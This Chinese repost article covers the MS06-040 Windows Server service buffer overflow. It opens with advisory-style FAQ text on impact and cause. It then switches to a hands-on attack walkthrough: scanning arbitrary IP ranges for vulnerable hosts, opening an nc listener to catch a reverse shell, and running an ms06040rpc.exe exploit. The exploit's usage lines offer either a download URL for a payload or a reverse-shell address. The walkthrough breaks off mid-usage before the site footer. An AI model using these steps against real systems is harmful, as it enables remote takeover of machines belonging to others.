Ms06040(Server服务中的缓冲区溢出漏洞)是继ms06035以后的又一个重大漏洞,利用此漏洞的魔波蠕虫已开始蔓延,相信互连网又会因此掀起血雨腥风。
此漏洞的影响范围有多大?
这是个远程执行代码漏洞。 成功利用此漏洞的攻击者能够远程完全控制受影响的系统。 攻击者可随后安装程式;查看、更改或删除数据;或创建拥有完全用户权限的新帐户。
造成漏洞的原因是什么?
Server 服务中未经检查的缓冲区。
什么是 Server 服务?
Server 服务通过网络提供 RPC 支持和文档打印支持连同命名管道共享。 Server 服务允许共享您的本地资源(例如磁盘和打印机),以便网络上的其他用户能够访问。 他还允许在其他电脑和您的电脑上运行的应用程式之间进行命名管道通信(用于 RPC)。
攻击者可能利用此漏洞执行什么操作?
成功利用此漏洞的攻击者能够完全控制受影响的系统。
哪些人可能会利用此漏洞?
任何可向受影响的系统传送特制消息的匿名用户都能够尝试利用此漏洞。
攻击者能够如何利用此漏洞?
攻击者可能试图通过创建特制的消息并将其发送到受影响的系统来利用此漏洞。 这样,这些消息可能导致受影响的系统执行代码。
受此漏洞威胁最大的系统有哪些?
任何工作站和服务器均受此问题的威胁,其中由于该漏洞的独特特征连同受影响的代码路径,Windows 2000 系统受到的威胁最大。
漏洞实战:
首先我们弄了个扫描工具:rpc-server Scanner
IP地址填入您想扫描的网段,点“扫描全部”
现在他已开始工作了,去喝口水回来,已全部扫描完毕
看到没,显示Vulnerable的就说明存在漏洞
我们来利用,首先在开始运行里打开CMD
用nc监听一个端口
我这输入“Nc –l –vv –p
现在我们开始溢出
这是他的说明
Usage: ms06040rpc.exe <host> <download url> <os type>
ms06040rpc.exe <host> <reverse addr> <revser port> <os type>
<download url>:
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
